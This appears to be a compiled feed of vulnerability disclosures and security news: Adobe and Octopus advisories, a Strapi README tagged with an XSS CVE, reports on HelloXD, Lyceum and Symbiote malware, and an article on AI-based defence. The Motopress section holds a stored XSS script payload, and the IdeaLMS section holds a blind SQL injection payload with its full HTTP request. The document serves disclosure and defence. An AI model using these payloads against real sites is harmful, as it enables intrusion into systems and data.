Adobe Media Encoder version 15.4 (and earlier) are affected by a memory corruption vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious M4A file.

Security Updates Available for Adobe Media Encoder | APSB21-70

Bulletin ID

Date Published

Priority

APSB21-70

August 17, 2021      

3

**Summary**

Adobe has released an update for Adobe Media Encoder.  This update resolves a critical vulnerability that could lead to arbitrary code execution in the context of the current user.                         

**Affected Versions**

**Product**

**Version**

**Platform**

Adobe Media Encoder

15.4 and earlier versions  

Windows and macOS  

**Solution**

Adobe categorizes these updates with the following  priority ratings and recommends users update their installation to the newest version via the Creative Cloud desktop app's update mechanism.  For more information, please reference this help page.

Product

Version

Platform

Priority

Adobe Media Encoder

15.4.1

Windows and macOS

3

For managed environments, IT administrators can use the Admin Console to deploy Creative Cloud applications to end users. Refer to this help page for more information.

**Vulnerability details**

Vulnerability Category

Vulnerability Impact

Severity

**CVSS base score**   

**CVSS vector**  

CVE Numbers

Access of Memory Location After End of Buffer

(CWE-788)

Arbitrary code execution   

Critical     

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-36070

Access of Memory Location After End of Buffer

(CWE-788)

Arbitrary code execution   

Critical     

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2021-46818  

Access of Memory Location After End of Buffer

(CWE-788)

Arbitrary code execution   

Critical     

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2021-46817  

**Acknowledgments**

Adobe would like to thank  CQY of Topsec Alpha Team (yjdfy) for reporting the relevant issues and for working with Adobe to help protect our customers.  

**Revisions**

June 9, 2022: CVE numbers revised to CVE-2021-46818 and CVE-2021-46817  

May 10, 2022: Affected Version Platform revised.  

For more information, visit https://helpx.adobe.com/security.html , or email PSIRT@adobe.com

CVE-2021-46817: Adobe Security Bulletin

Adobe Premiere Pro version 15.4 (and earlier) are affected by a memory corruption vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious M4A file.

Security Updates Available for Adobe Premiere Pro | APSB21-67

Bulletin ID

Date Published

Priority

ASPB21-67  

September  14, 2021     

3

**Summary**

Adobe has released updates for Adobe Premiere Pro for Windows and macOS. This update addresses a critical vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.      

**Affected Versions**

**Product**

**Version**

**Platform**

Adobe Premiere Pro 

15.4 and earlier versions       

Windows

**Solution**

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version via the Creative Cloud desktop app’s update mechanism.  For more information, please reference this help page.

Product

Version

Platform

Priority Rating

Availability

Adobe Premiere Pro

15.4.1

Windows and macOS

3

Download Center    

For managed environments, IT administrators can use the Admin Console to deploy Creative Cloud applications to end users. Refer to this help page for more information.

**Vulnerability details**

Vulnerability Category

Vulnerability Impact

Severity

**CVSS base score**    

**CVSS vector**   

CVE Numbers

Access of Memory Location After End of Buffer

(CWE-788)

Arbitrary Code Execution 

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-46816  

**Acknowledgments**

Adobe would like to thank CQY of Topsec Alpha Team (yjdfy) for reporting these issues and for working with Adobe to help protect our customers.         

**Revisions**

June 9, 2022: CVE updated to CVE-2021-46816  

October 28, 2021: Added details for CVE-2021-42723.

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com

CVE-2021-46816: Adobe Security Bulletin

Windows and Linux systems are being targeted by a ransomware variant called HelloXD, with the infections also involving the deployment of a backdoor to facilitate persistent remote access to infected hosts.
"Unlike other ransomware groups, this ransomware family doesn't have an active leak site; instead it prefers to direct the impacted victim to negotiations through Tox chat and onion-based

Windows and Linux systems are being targeted by a ransomware variant called HelloXD, with the infections also involving the deployment of a backdoor to facilitate persistent remote access to infected hosts.

"Unlike other ransomware groups, this ransomware family doesn't have an active leak site; instead it prefers to direct the impacted victim to negotiations through Tox chat and onion-based messenger instances," Daniel Bunce and Doel Santos, security researchers from Palo Alto Networks Unit 42, said in a new write-up.

HelloXD surfaced in the wild on November 30, 2021, and is based off leaked code from Babuk, which was published on a Russian-language cybercrime forum in September 2021.

The ransomware family is no exception to the norm in that the operators follow the tried-and-tested approach of double extortion to demand cryptocurrency payments by exfiltrating a victim's sensitive data in addition to encrypting it and threatening to publicize the information.

The implant in question, named MicroBackdoor, is an open-source malware that's used for command-and-control (C2) communications, with its developer Dmytro Oleksiuk calling it a "really minimalistic thing with all of the basic features in less than 5,000 lines of code."

Notably, different variants of the implant were adopted by the Belarusian threat actor dubbed Ghostwriter (aka UNC1151) in its cyber operations against Ukrainian state organizations in March 2022.

MicroBackdoor's features allow an attacker to browse the file system, upload and download files, execute commands, and erase evidence of its presence from the compromise machines. It's suspected that the deployment of the backdoor is carried out to "monitor the progress of the ransomware."

Unit 42 said it linked the likely Russian developer behind HelloXD — who goes by the online aliases x4k, L4ckyguy, unKn0wn, unk0w, \_unkn0wn, and x4kme — to further malicious activities such as selling proof-of-concept (PoC) exploits and custom Kali Linux distributions by piecing together the actor's digital trail.

"x4k has a very solid online presence, which has enabled us to uncover much of his activity in these last two years," the researchers said. "This threat actor has done little to hide malicious activity, and is probably going to continue this behavior."

The findings come as a new study from IBM X-Force revealed that the average duration of an enterprise ransomware attack — i.e., the time between initial access and ransomware deployment — reduced 94.34% between 2019 and 2021 from over two months to a mere 3.85 days.

The increased speed and efficiency trends in the ransomware-as-a-service (RaaS) ecosystem has been attributed to the pivotal role played by initial access brokers (IABs) in obtaining access to victim networks and then selling the access to affiliates, who, in turn, abuse the foothold to deploy ransomware payloads.

"Purchasing access may significantly reduce the amount of time it takes ransomware operators to conduct an attack by enabling reconnaissance of systems and the identification of key data earlier and with greater ease," Intel 471 said in a report highlighting the close working relationships between IABs and ransomware crews.

"Additionally, as relationships strengthen, ransomware groups may identify a victim who they wish to target and the access merchant could provide them the access once it is available."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hello XD Ransomware Installing Backdoor on Targeted Windows and Linux Systems

Strapi v3.x.x versions and earlier contain a stored cross-site scripting vulnerability in file upload function. By exploiting this vulnerability, an arbitrary script may be executed on the web browser of the user who is logging in to the product with the administrative privilege.

 

**API creation made simple, secure and fast.**

The most advanced open-source headless CMS to build powerful APIs with no effort.

Try live demo

  

Strapi is a free and open-source headless CMS delivering your content anywhere you need.

*   **Keep control over your data**. With Strapi, you know where your data is stored, and you keep full control at all times.
*   **Self-hosted**. You can host and scale Strapi projects the way you want. You can choose any hosting platform you want: AWS, Render, Netlify, Heroku, a VPS, or a dedicated server. You can scale as you grow, 100% independent.
*   **Database agnostic**. Strapi works with SQL databases. You can choose the database you prefer: PostgreSQL, MySQL, MariaDB, and SQLite.
*   **Customizable**. You can quickly build your logic by fully customizing APIs, routes, or plugins to fit your needs perfectly.

**Getting Started**

Read the Getting Started tutorial or follow the steps below:

**⏳ Installation**

Install Strapi with this **Quickstart** command to create a Strapi project instantly:

*   (Use **yarn** to install the Strapi project (recommended). Install yarn with these docs.)

yarn create strapi-app my-project --quickstart

**or**

*   (Use npm/npx to install the Strapi project.)

npx create-strapi-app my-project --quickstart

This command generates a brand new project with the default features (authentication, permissions, content management, content type builder & file upload). The **Quickstart** command installs Strapi using a **SQLite** database which is used for prototyping in development.

Enjoy 🎉

**🖐 Requirements**

Complete installation requirements can be found in the documentation under Installation Requirements.

**Supported operating systems**:

*   Ubuntu LTS/Debian 9.x
*   CentOS/RHEL 8
*   macOS Mojave
*   Windows 10
*   Docker - Docker-Repo

(Please note that Strapi may work on other operating systems, but these are not tested nor officially supported at this time.)

**Node:**

*   NodeJS >= 12 <= 16
*   NPM >= 6.x

**Database:**

*   MySQL >= 5.7.8
*   MariaDB >= 10.2.7
*   PostgreSQL >= 10
*   SQLite >= 3

**We recommend always using the latest version of Strapi to start your new projects**.

**Features**

*   **Modern Admin Panel:** Elegant, entirely customizable and a fully extensible admin panel.
*   **Secure by default:** Reusable policies, CORS, CSP, P3P, Xframe, XSS, and more.
*   **Plugins Oriented:** Install the auth system, content management, custom plugins, and more, in seconds.
*   **Blazing Fast:** Built on top of Node.js, Strapi delivers amazing performance.
*   **Front-end Agnostic:** Use any front-end framework (React, Vue, Angular, etc.), mobile apps or even IoT.
*   **Powerful CLI:** Scaffold projects and APIs on the fly.
*   **SQL databases:** Works with PostgreSQL, MySQL, MariaDB, and SQLite.

**See more on our website**.

**Contributing**

Please read our Contributing Guide before submitting a Pull Request to the project.

**Community support**

For general help using Strapi, please refer to the official Strapi documentation. For additional help, you can use one of these channels to ask a question:

*   Discord (For live discussion with the Community and Strapi team)
*   GitHub (Bug reports, Contributions)
*   Community Forum (Questions and Discussions)
*   Feedback section (Roadmap, Feature requests)
*   Twitter (Get the news fast)
*   Facebook
*   YouTube Channel (Learn from Video Tutorials)

**Migration**

Follow our migration guides on the documentation to keep your projects up-to-date.

**Roadmap**

Check out our roadmap to get informed of the latest features released and the upcoming ones. You may also give us insights and vote for a specific feature.

**Documentation**

See our dedicated repository for the Strapi documentation, or view our documentation live:

*   Developer docs
*   User guide

**Try live demo**

See for yourself what's under the hood by getting access to a hosted Strapi project with sample data.

**License**

See the LICENSE file for licensing information.

CVE-2022-29894: GitHub - strapi/strapi: 🚀 Open source Node.js Headless CMS to easily build customisable APIs

The Iranian state-sponsored threat actor tracked under the moniker Lyceum has turned to using a new custom .NET-based backdoor in recent campaigns directed against the Middle East.
"The new malware is a .NET based DNS Backdoor which is a customized version of the open source tool 'DIG.net,'" Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar said in a report published last week.
"

The Iranian state-sponsored threat actor tracked under the moniker Lyceum has turned to using a new custom .NET-based backdoor in recent campaigns directed against the Middle East.

"The new malware is a .NET based DNS Backdoor which is a customized version of the open source tool 'DIG.net,'" Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar said in a report published last week.

"The malware leverages a DNS attack technique called 'DNS Hijacking' in which an attacker-controlled DNS server manipulates the response of DNS queries and resolves them as per their malicious requirements."

DNS hijacking is a redirection attack in which DNS queries to genuine websites are intercepted to take an unsuspecting user to fraudulent pages under an adversary's control. Unlike cache poisoning, DNS hijacking targets the DNS record of the website on the nameserver, rather than a resolver's cache.

Lyceum, also known as Hexane, Spirlin, or Siamesekitten, is primarily known for its cyber attacks in the Middle East and Africa. Earlier this year, Slovak cybersecurity firm ESET tied its activities to another threat actor called OilRig (aka APT34).

The latest infection chain involves the use of a macro-laced Microsoft Document downloaded from a domain named "news-spot\[.\]live," impersonating a legitimate news report from Radio Free Europe/Radio Liberty about Iran's drone strikes in December 2021.

Enabling the macro results in the execution of a malicious code that drops the implant to the Windows Startup folder to establish persistence and ensure it automatically runs every time the system is restarted.

The .NET DNS backdoor, dubbed DnsSystem, is a reworked variant of the open-source DIG.net DNS resolver tool, enabling the Lyceum actor to parse DNS responses issued from the DNS server ("cyberclub\[.\]one") and carry out its nefarious goals.

In addition to abusing the DNS protocol for command-and-control (C2) communications to evade detection, the malware is equipped to upload and download arbitrary files to and from the remote server as well as execute malicious system commands remotely on the compromised host.

"APT threat actors are continuously evolving their tactics and malware to successfully carry out attacks against their targets," the researchers said. "Attackers continuously embrace new anti-analysis tricks to evade security solutions; re-packaging of malware makes static analysis even more challenging."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Iranian Hackers Spotted Using a new DNS Hijacking Malware in Recent Attacks

In Octopus Server after version 2022.1.1495 and before 2022.1.2647 if private spaces were enabled via the experimental feature flag all new users would have access to the Script Console within their private space.

Summary

Script Console Access via Private Space in Octopus Server (CVE-2022-2013)

Advisory Number

2022-05

Discovery Date

18 May 2022

Patch Release Date

20 May 2022

Advisory Release Date

13 Jun 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-2013

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.1.2647 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy security levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In Octopus Server after version 2022.1.1495 and before 2022.1.2647 if private spaces were enabled via the experimental feature flag all new users would have access to the Script Console within their private space.

The versions of Octopus Server affected by this vulnerability are:

*   All versions after 2022.1.1495 and before 2022.1.2647

**Fix**

To address this vulnerability, we have released Octopus Server version 2022.1.2647.

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.1.2647). You can download the latest version of Octopus Server from https://octopus.com/downloads

**Mitigation**

There is no known mitigation for CVE-2022-2013, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team (https://octopus.com/support).

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found during internal testing at Octopus Deploy.

CVE-2022-2013: Security Advisory 2022-05

A Linux-based banking Trojan is a master at staying under the radar.

A stealthy Linux threat called Symbiote is targeting financial institutions in Latin America, with all file, processes, and network artifacts hidden by the malware, making it virtually invisible to detection by live forensics.

The malware was first uncovered in November, according to a blog post by BlackBerry Research. What sets Symbiote apart from other Linux malware is its approach to infecting running processes, rather than using a stand-alone executable file to inflict damage.

It then harvests credentials to provide remote access for the threat actor, exfiltrating credentials as well as storing them locally.

"It operates as a rootkit and hides its presence on the machine. Once it has infected the machine fully, it allows you to see only what it wants you to see," Joakim Kennedy, security researcher at Intezer and author of the BlackBerry blog post, explains. "Essentially, you can't trust what the machine is telling you."

However, it can be detected externally, he says, since it exfiltrates stolen credentials via the DNS requests.

Kennedy says the domain names the malware uses impersonate big banks in Brazil, which also helps it stay under the radar.

"While we couldn't tell based on only what we found, attackers targeting financial institutions are often motivated by potential monetary gain," he says.

**Shared Object Library**

Nicole Hoffman, senior cyber threat intelligence analyst at Digital Shadows, points out that unlike most malware variants, the Symbiote malware is a shared object library, instead of an executable file.

Symbiote uses the LD\_PRELOAD variable that allows it to be pre-loaded by applications before other shared object libraries.

"This is a sophisticated and evasive technique that can help the malware blend in with legitimate running processes and applications, which is one of the reasons Symbiote is difficult to detect," she says.

The malware also has Berkeley Packet Filter (BPF) hooking functionality. Packet capture tools intercept, or capture, network traffic typically for the purposes of an investigation.

BPF is a tool embedded within several Linux operating systems that allows users to filter out certain packets depending on the type of investigation they are performing, which can reduce the overall results, making analysis easier.

"The Symbiote malware is designed to essentially filter its traffic out of the packet capture results," Hoffman explains. "This is just another layer of stealth used by the attackers to cover their tracks and fly under the radar."

Kennedy adds that this is the first time the BPF hooking functionality has been observed operating in this way, and points out that other malware variants have typically used BPF to receive commands from their command-and-control server.

"This malware instead uses this method to hide network activity," he says. "It's an active measure used by the malware to prevent being detected if someone investigates the infected machine — like covering up its footsteps so it's harder to track down.”

**Easier to Attack?**

Mike Parkin, senior technical engineer at Vulcan Cyber, says there may be a perception on the attacker's part that the targets in Latin America have a less mature security infrastructure and would thus be easier to attack.

He explains that the attackers went out of their way to hide their malware from anything that's running on the infected system, leveraging BPF to hide their communications traffic.

"While this will work on the local host, other network-monitoring tools will be able to identify the hostile traffic and the infected source," he says.

He explains that there are several endpoint tools available that should identify changes on a victim system.

"There are also forensic techniques that can use the malware's own behavior against it to reveal its presence," he notes. "The authors who created Symbiote went to great lengths hide their malware. They leveraged a combination of techniques, though in so doing delivered some indicators of compromise that defenders could use to identify an infection in-situ."

Kennedy says that the most important action is to focus on the techniques used by this malware to ensure that you can detect and/or protect against those, whether you're protecting against Symbiote or another attack that uses the same technique.

"I would say Symbiote, and other recently discovered undetected Linux malware, shows that operating systems other than Windows are not immune to highly evasive malware," he says. "Since it doesn’t get as much attention as Windows malware, we don't know what else is out there that hasn’t been discovered yet."

Symbiote Malware Poses Stealthy, Linux-Based Threat to Financial Industry

WordPress Motopress Hotel Booking Lite plugin version 4.2.4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)# Date: 2022-06-05# Exploit Author: Sanjay Singh# Vendor Homepage: https://motopress.com/# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip# Version: 4.2.4# Tested on: Windows/XAMPP###########################################################################PoC:1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type2. Click on "Add Accommodation Type".3. Add title payload= "><script>alert("XSS")</script>4. Excerpt input payload "><script>alert("XSS")</script>5. Click publish.6. Visit http://localhost/accommodations/7. XSS payload execute.

WordPress Motopress Hotel Booking Lite 4.2.4 Cross Site Scripting

Next-generation AI products learn proactively and identify changes in the networks, users, and databases using "data drift" to adapt to specific threats as they evolve.

In March 2019, Norsk Hydro, a Norwegian renewable energy and aluminum manufacturing company, faced a ransomware attack. Rather than paying the ransom, a cybersecurity team used artificial intelligence to identify the corruption in the computer system and rebuild the operations in an uncorrupted parallel system. LockerGoga ransomware was eventually identified as the culprit, which spread via Windows-based systems. While Norsk avoided paying the ransom, the attack still forced it to operate without computer systems for an extended period of time (weeks to months), while the security team isolated and scanned thousands of employee accounts for malicious activity.

Signature-based detection is an approach in which a unique identifier is established about a known threat so that it can be identified in the future. However, signature-based approaches require continuous updates that take time and effort to maintain. Next-generation artificial intelligence (AI) products learn proactively and identify changes in the networks, users, and databases through what is called data drift to adapt to specific threats as they evolve.

AI products are the linchpin of a multifaceted defense system that can be utilized in the background prophylactically, especially against unknown threats. Cyberattacks that make the evening news are usually the ones that end in disaster; it is hardly ever reported how AI could have prevented those attacks in the first place. In addition, cyberattacks that are contained or thwarted on a daily basis, while AI is ubiquitously at work, are almost never reported in the news because they happen so frequently.

Unfortunately, as a result of the lack of coverage on these "non-events" in public forums, most people don't understand how AI makes an effective cyber defense achievable and not just theoretical. Here is what you should know.

**Deep-Learning Next-Generation AI Tools**

Data drift is a term used to measure changes in underlying data patterns. A typical example would be if an e-commerce business launched a new payment gateway to sell furniture. In this instance, BECS direct deposit might be a new financial term introduced in the business workflow. BECS, or Bulk Electronic Clearing System, governs how direct debits, automatic payments, bill payments, and direct credits work and how a range of bulk electronic transaction types are made between its participants.

Deep-learning AI models can detect the term and, with minimal human assistance, classify it as a financial transaction. Next-generation AI then can monitor financial transaction data flows and correlate the data accordingly, associating it with financial context and sensitivity.

The financial data monitoring can involve, for example, an application programming interface while the user checks out via online shopping cart or even general business flow. The advantage of the auto-detection approach is that a security team doesn't need to be on the lookout for new vulnerability patches for these terms. Instead, the security team can rely on AI to recommend new data patterns and self-patch accordingly.

A successful effort to thwart phishing attacks that endangered Stanford University can be used as an illustration. WannaCry ransomware threatened campus systems, but the university's self-patching AI software, in addition to its firewall protections and email security solutions, prevented the threats from successfully escalating.

Data transformers are one of the AI tools used to auto-discover and classify data patterns. A transformer model memorizes and tracks relationships between changes in data attributes to create contextual insights. It is similar in many ways to how a human brain works when reading a book. Although you often do not understand a character's role in the story or their relationships with the other characters when they first appear, you gain that knowledge as the story develops.

Data transformers use attention-based mechanisms constantly learning in the same way to gain a greater understanding of networks, files, emails, etc., and how the content of data relate to and interact with each other to identify and classify malicious changes. The text is represented by mathematical datasets, which derive data representations that can be later used to quantify the changes in data as it is being processed by a transformer.

Deep-learning models can also be used for behavioral purpose classification, which assist security teams with efficiently identifying sensitive or harmful content. An AI transformer model uses its understanding of natural language to analyze email data it has never been exposed to, such as credit offers, lottery ticket promotions, employment offers, or COVID test results, in order to classify and identify malicious content. Similar mechanisms can be used to identify malicious content in documents containing employee health information even though the AI model had never analyzed any kind of healthcare data before. The transfer model proactively alerted security teams regarding the sharing of sensitive data before a breach occurred.

**What This Means for Your Business**

Not only is it important to ensure that cybersecurity systems are in place to defend against and prevent threats, but it's also important to have the right one that synthesizes with your business's needs. Manual document classification for documents, emails, and text messages is complex and requires technical expertise. Deep-learning transformers simplify those tasks, and if done right, can be leveraged efficiently to save costs and effort.

However, an AI model with incorrect settings can result in false positives, and in turn, generate too many alerts, creating headaches for security teams. As a result, one should always seek expert advice when selecting products with AI components. The next-gen AI tools will be able to automate your business processes with minimal setup, human intervention, rules, and policies.

Artificial Intelligence and Security: What You Should Know

IdeaLMS 2022 allows SQL injection via the IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID= pathname.

Vulnerability Type: SQL Injection Vulnerability (Boolean-Based Blind)

Vendor of Product: Ideaco.ir

Affected Product Code Base: IdeaLMS

Product Version: 2022

Description: IdeaLMS allows SQL Injection via the ClassID parameter

Attack Vectors: Attacker should inject malicious payload into ClassID parameter

Attack Type: Remote

Payload: -1%20waitfor%20delay'0%3a0%3a20'--

Assigned CVE-ID: <TBD>

Discoverer: Mohammad Reza Ismaeli Taba, Raspina Net Pars Group (RNPG Ltd.)

Steps To Reproduce

1\. Browse the following page: https://<target.xyz>/IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID=6

2\. Insert the malicious query as the value in ClassID parameter

Example: https://<target.xyz>/IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID=-1%20waitfor%20delay'0%3a0%3a20'--

#PoC

GET /IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID=-1%20waitfor%20delay'0%3a0%3a20'-- HTTP/1.1

Host: <address in which IdeaLMS is set up>

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Tag

#windows